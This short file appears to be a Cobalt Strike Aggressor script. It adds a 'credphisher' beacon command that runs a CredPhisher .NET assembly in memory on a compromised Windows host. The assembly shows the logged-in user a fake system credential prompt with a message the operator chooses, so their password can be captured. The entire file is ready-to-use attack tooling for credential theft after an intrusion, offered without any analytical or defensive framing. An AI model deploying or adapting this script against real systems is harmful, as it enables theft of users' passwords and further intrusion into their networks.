beacon_command_register("credphisher", "C# Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function",
	"Usage: credphisher 'Message_For_Current_User'\n\n" .
	"Uses execute-assembly to run the assembly and takes given arguments\n");
alias credphisher{
	local('$bid $asm $desc @args $argu');
	$bid = $1;
	$asm = "/opt/exe/CredPhisher.exe";
	$desc = "CredPhisher";
	@args = @_;
	remove(@args, $bid);
	$argu = join(' ', @args);
	if ($argu eq ""){
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
	}
	else{
		blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
	}
	bexecute_assembly!($bid, $asm, $argu);
}
